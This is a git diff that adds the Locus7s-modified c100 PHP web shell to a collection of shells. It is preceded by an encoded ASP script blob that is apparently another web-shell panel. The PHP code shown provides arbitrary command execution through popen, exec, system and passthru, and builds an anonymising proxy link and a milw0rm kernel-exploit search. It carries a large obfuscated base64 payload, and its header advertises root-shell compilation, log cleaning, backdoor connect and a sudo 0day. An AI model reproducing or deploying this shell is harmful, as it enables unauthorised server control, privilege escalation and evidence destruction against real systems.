Ax9@#@&idi7d"+dwKxdncDbO+,JP&U[+XVDnPtCMl.P7nDs+~E@#@&d77id]+k2KxdRqDkD+,E@!bx2EDPOza+'E^tm3(GaB,xm:n'vtmDCDjnDs+v~7lV;n{BTB@*@!(D@*r@#@&ddidirs,KC4^+~@!@*PKbOVPK4nU)"+kwGxdnc.kDnPr|C.şı^lşYı.hmVı~|KUDDG^",5+D3bdk.P3Dbşkh cRJ=]+kwW	dnRAx9@#@&d77id]+k2W	/n qDkOn,J@!k	2!Y~DXa+'rJMCNbWEJ,xCh'Jrhlk/WaOEJ,\mV;+xEr4.EDnJrP^4m3n[@*IGWD~7+~zVDP|^lkö.VD'x(/2ILx4k2iLx4k2IJ@#@&id7d7]/2W	d+c.rD+PE@!bx2ED~DX2'rJDmNbGJrPUls+xEr:lkdWaYJr~-l^E'EJdr	os+rE@*Ul[n1+P]GKY~|^CköDsD@!4D@*@!(.@*r@#@&did77bsP:C4^+P@!@*~KbY^+~K4n	)]+k2W	/n qDkOn,Je+DVb/r.PADkşb:c Rr)]+kwGUk+RAUN@#@&di77dbs,:rNcrsoS%B+#,@!@*~rlDE~:tnx=]/2Kxk+RqDbO+,J/X(+.jaXPl~z,|W9~e+D3b/ry^n,fnğkşDrDbVrzKDJl]/2W	dR3	N@#@&didi7I/2W	/n qDkDnPr@!k	2;Y,YHwn'EEkE8:bOJrP-C^E+xErKühPUrD+sDbPCmm0s+rJ@*@!JmnUD+D@*E@#@&ddi77I/aWU/n qDrY~J@!ZnUD+D@*E,[~JUnçbVn	PnVlköD9n3bPPü:,?rOV+MnP}YWsCOk0P_l^3n[,kUNaPzYC.rP[~E@!ZnxDnM@*E,[,J@!(D@*E@#@&d7did]nkwW	d+cDbOnPr@!J0GDh@*r@#@&di7diko~:l4sn,@!@*P:rDVn,K4+x=IdwKxd+c.rD+PrÇCwMly,FGxDDKVZP/z(+.?azPlP&~nWN~eYVkkr.mn,fğkşYbDbskHW.RcREl"+/aGxk+RAU[@#@&did7d@#@&id7di@#@&id77AV/n@#@&d7di7U+O,r(LsUr,xP;DnlD+68N+mDcJUmDb2Ok	ocsrVnjH/O+s64N+^Or#@#@&7id7daCDtH/	+KXY,xPd+WYv?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##Bq	dYMIn\v?n.7+Dc\lanlD4cI;!+dY jD-+M#lMkC8^+/cEUZ]qhP|1)t2r##BJ'E#*@#@&did77;O:Gw^ECm^VP{PalOtHnkxnKXOPLPE/qRtOhr@#@&di7idjY,1+kxP6DPxP}4%okWR}2+	K+XOok^+vZ	OPGaV;Cm^3BP+S,KD;nBPol^d#@#@&diddikw~Km4s+,@!@*~:kY^nP:t+	l]+kwKxd+ 	MkO+,EÇlaDC",|WUOMWs",/H4nM?aXPlPJ~|KN~5YVrkky1nPG+ğkşDr.k^kHW.R  r)]+k2W	/n AxN@#@&id7di-YGMNVk	tmdP{Pjw^kOc"+;!n/DRsK.h`rmKxO+UOr#S.(/Dd0b@#@&dd77isGD,r,'~ZP:WP`AK;x9`-+DW.[Vk	4lk#@#@&77didi1n/Un:6ORq.kD+Jr	+`-nDW.Nsbx4m/vk#*@#@&7did716O@#@&ddi7dU+Y,/z4Dql.DrGM{e+	r1/Un,'P68Nsjrc!YobV`ZqO:Gw^Eul13b@#@&ddi7d@#@&di77dbs,In;;nkY sK.:vJhCk/W2Or#~',EkkUTVJP:tU@#@&d7did7/mVV,PWaVEGnWl1+v.nDrKmDC:OD~Edbxosnr~64NoUrS;X(+DqlM.kKDm5xrH/xb@#@&ddi772^/koP]n$En/D sKDhcr:lddKwOJ*~{PE(D!Y+rP:4+	@#@&did77iZl^sP:Ww^;9+6l1+c.n.bnCDmh+DDnSr4D;OJSr(%w?6BZH4+Mm.DbW.{I+Urg+/	n#@#@&di77dAx9Prs@#@&id7dAUN,ko@#@&dd73	N~kw@#@&d7i@#@&ks,Km8VP@!@*,KrO^+P:4+	)Id2W	/R	DrOPEÇla.l.PFG	YDGseP/X(nM?2HPlPz,|K[PI+O3b/r"1+PGnğkşDkDbsrXKDcR Jl]/2W	d+c2U[idd77@#@&7dAU9Pj!4@#@&dikw~KMkh`"+5;/Yc}EDXUO.k	ovJ/X8nMCDMrWM{PGaVEFCDVrlsE*#~{PrY+kYr~K4+U@#@&d77U+Y,64Ns?}~xP;DlO+68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrb@#@&d7dalO4g+/	nKXYP{~J+6Yv?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BqxkO.I\v?nD-nMR\laKlDtc];EndDRj+M-D#mDbl4^+kcJUZ]qhKmHzH2rb#BJ-rbb@#@&didrs~hbNcksL~R~+b,@!@*~EmDEP:4xl"+kwW	/ MkO+,J/z(+DU2X,*PJ~FW9PI+O3rdby^+,9+ğbşYr.bVkzGMJlIdaWUk+c2x9@#@&7dirslH1nd	+/b~',wlD4H+kxKaY~',J/:n/DRsGTJ@#@&7idrs,hbNc:NBFvB *~@!@*PED rPP4x)"n/aWxkn MkD+~J/z(+.?azPlP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&ddij+DP1dU+:6DPxP68Nsjrc/DlOn:+6OobVn`}smXH/	+/b~:.E#@#@&id7jYP;z4Dm..kKD|5nxrH/U+,xP}4%oUrR!nDsrVc}VCH1/x/bb@#@&d7d;lss,}WMsl:Ww^;9+6l1+cIn2^l^+vPDb:c];EndDR}E.H?OMk	o`rwmOtr#b~ruESr-J*SJD+/DEb@#@&di2s/nrwPPDbh`"+5;/Y }!+.XUOMkUT`rZX(+M	lMDrWM{PGaVEnCY^klsEb#,',J/X8nMCDMrWM{9n6lmn6nJ~K4n	@#@&idiZl^V,tWMVCKKws;G+0m^+vI+asCm`:Dr:c];;+kORwW.hvJwCO4Jb#BE-JSr-r#~rZH8+MCDMkG.|f+6Cmr|rb@#@&idAx[Pro@#@&7Zmd+,2sd@#@&77;lsV,$KV;s?`A`*@#@&7d"+dwKxdncDbO+,?l(rOAm/^kVP'~~Wd?m8kDbsC	@#@&77;lsV,/H4nMmDDbWMmMKD;xDEsnUE4vb@#@&2x9~j+^+1Y@#@&ro,KC4^nP@!@*~PbYVn~:tnx@#@&"+daW	/+cI[kM+^Y,J4ODw)J&hShR;z8+MOql.DrGMR6DTE@#@&2U[,ks@#@&bs~:b[vK[BF+~ *P@!@*PrD EP:tnU=I+k2W	/+c	.kD+,J/X8nM?2X,XPJP/z(+DR	mD.kK.cr.TJ=I+kwKU/R3x9@#@&vbsPA.Dc1Es8nD,@!@*PTPP4x@#@&E]+kwGUk+R	.bYnPr@!(D@*@!0KxY,0m^+{BCDblsv,/k.n'E B@*uCYm),J~[~3MD 1!h4D~',J@!8.@*@!8D@*@!(@*E,[,jZm/c2MD f/^.bwYbGx*P[,E@!z(@*@!4.@*$rMPulDCP}V;şO!J@#@&v"+dwKUk+ qDbY+,J@!8D@*@!WW	Y~Wmm+{vlMkl^v~/by'v v@*_lOl=~J,[~3MDRH;s4nD,',J@!(D@*@!4M@*@!8@*,CCYmR  cP5m":mzr0;hl,k.xrPeG0@!&4@*@!4M@*E@#@&B2U[,ko@#@&@#@&InkwKx/Rq.kD+~+	N^G9+@#@&]+kwW	dnRqDbYnPE@!(D@*@!;nxD+.@*@!sWUO,sCmxEr	o9kxT/E~?byn'EGv~;WVK.P{PBwooswsE@*@!4@*~µ,@!&4@*@!zwWUO@*@!z/n	YnD@*E@#@&@#@&uJ9cAA==^#~@%>
diff --git a/138shell/C/c100.txt b/138shell/C/c100.txt
new file mode 100644
index 0000000..cb3fe60
--- /dev/null
+++ b/138shell/C/c100.txt
@@ -0,0 +1,3595 @@
+<?php
+
+/******************************************************************************************
+*  Locus7s Modified c100 Shell                                                                 
+*  Beta v. 1.0a - Project x2300                                                                   
+*  Written by Captain Crunch Team                                                          
+*  Modified by Shadow & Preddy                                                              
+*  Re-Modified by #!physx^ (15.2.07)                                                          
+*========================================================
+*  New Modifications Implemented --                                                      
++--------------------------------------------------------+
+*  -Added link to Enumerate to escalate priviledges      
+*  -Added Rootshell.c                                     
+*  -Added Rootshell.c;auto-compiler                      
+*  -Execute Rootshell.c                                  
+*  -Added Mig-Log Logcleaner                             
+*  -Execute Mig-Log Logcleaner                           
+*  -milw0rm searcher (Grabs OS and searches milw0rm)    
+*  -Locus7s Style & Image                                
+*  -Added w4ck1ng Shell Backdoor Connect and Backdoor    
+*  -Added PHP-Proxy link to hide your ass                
+*  -Added your ip and server ip with whois capability    
+*  -Added private 0day released by allahaka which utilizes the linux
+*   sudo bash to execute a stack overflow.
+*========================================================
+*  FEB. 14, 2007 RELEASE NOTES:                          
++--------------------------------------------------------+
+*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     
+*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           
+*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. 
+*========================================================
+*  PRODUCT INFO:                                         
++--------------------------------------------------------+
+*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    
+*  WWW.CCTEAM.RU                                         
+*  C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S     
+*  UNDERGROUND NETWORK | WWW.LOCUS7S.COM                 
+*  \E0T/                                                 
+*********************************************************/
+
+//for php proxy purposes
+
+function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
+$selfurl = base64_encode(selfURL());
+$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
+
+//end of link
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+$proxy_shit="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